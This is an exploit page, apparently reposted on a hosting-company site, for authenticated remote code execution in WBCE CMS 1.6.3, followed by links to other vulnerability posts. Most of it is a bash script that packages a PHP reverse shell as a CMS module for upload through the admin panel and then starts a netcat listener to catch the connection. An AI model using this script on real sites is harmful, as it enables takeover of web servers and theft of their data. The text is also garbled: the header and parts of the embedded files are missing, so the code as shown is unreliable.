WBCE CMS 1.6.3 – Authenticated Remote Code Execution (RCE) 

# Exploit Title: WBCE CMS  "
	exit 1
fi

if [ -z "$(which nc)" ]; then
	echo "[!] Netcat is not installed."
	exit 1 
fi

ip=$1
port=$2

rm -rf shellModule.zip
rm -rf shellModule
mkdir shellModule

echo [*] Crafting Payload

cat  shellModule/info.php

EOF

cat  shellModule/install.php
 array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

\$process = proc_open(\$shell, \$descriptorspec, \$pipes);

if (!is_resource(\$process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

stream_set_blocking(\$pipes[0], 0);
stream_set_blocking(\$pipes[1], 0);
stream_set_blocking(\$pipes[2], 0);
stream_set_blocking(\$sock, 0);

printit("Successfully opened reverse shell to \$ip:\$port");

while (1) {
	if (feof(\$sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	if (feof(\$pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	\$read_a = array(\$sock, \$pipes[1], \$pipes[2]);
	\$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);

	if (in_array(\$sock, \$read_a)) {
		if (\$debug) printit("SOCK READ");
		\$input = fread(\$sock, \$chunk_size);
		if (\$debug) printit("SOCK: \$input");
		fwrite(\$pipes[0], \$input);
	}

	if (in_array(\$pipes[1], \$read_a)) {
		if (\$debug) printit("STDOUT READ");
		\$input = fread(\$pipes[1], \$chunk_size);
		if (\$debug) printit("STDOUT: \$input");
		fwrite(\$sock, \$input);
	}

	if (in_array(\$pipes[2], \$read_a)) {
		if (\$debug) printit("STDERR READ");
		\$input = fread(\$pipes[2], \$chunk_size);
		if (\$debug) printit("STDERR: \$input");
		fwrite(\$sock, \$input);
	}
}

fclose(\$sock);
fclose(\$pipes[0]);
fclose(\$pipes[1]);
fclose(\$pipes[2]);
proc_close(\$process);

function printit (\$string) {
	if (!\$daemon) {
		print "\$string\n";
	}
}

?> 
EOF

echo [*] Zipping to shellModule.zip
zip -r shellModule.zip shellModule
rm -rf shellModule
echo [*] Please login to the WBCE admin panel to upload and install the module
echo [*] Starting listener

nc -lvnp $port

echo
echo
echo "[*] Done!"
echo "[*] Make sure to uninstall the module named 'Reverse Shell' in the module page"

آفاق هاستینگ مدیریت سرور مشاور و پشتیبان فنی

نوشته های مشابه

Multiple vulnerabilities in BizRobo!

TP-Link Deco BE65 Pro vulnerable to OS command injection

spider orange

Next.js Middleware 15.2.2 – Authorization Bypass

spider orange

IBM Security Verify Access 10.0.0 – Open Redirect during OAuth Flow